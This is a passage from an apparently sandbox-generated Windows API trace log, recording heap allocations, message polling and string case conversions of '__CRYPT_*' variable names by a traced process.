wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0208.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0208.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0208.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0208.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0208.939] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0208.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0208.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0208.939] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0208.939] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0208.940] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0208.940] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0208.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0208.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0208.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0208.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0208.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0208.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0208.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0208.942] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0208.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0208.942] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0208.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0208.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0208.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0208.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0208.942] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0208.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0208.942] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0208.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0208.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0208.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0208.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0208.942] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0208.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0208.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0208.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0208.943] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0208.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0208.944] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0208.944] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0208.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0208.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0208.944] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0208.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0208.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0208.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0208.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0208.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0208.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0208.944] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0208.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0208.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0208.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0208.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0208.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0208.945] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0208.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0208.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0208.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0208.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0208.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0208.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0208.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0208.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0208.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0208.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0208.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0208.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0208.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0208.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0208.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0208.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0208.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0208.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0208.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0208.947] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0208.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0208.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0208.947] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0208.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0208.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0208.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0208.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0208.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0208.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0208.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0208.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0208.947] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0208.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0208.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0208.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0208.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0208.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0208.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0208.948] HeapFree (in: 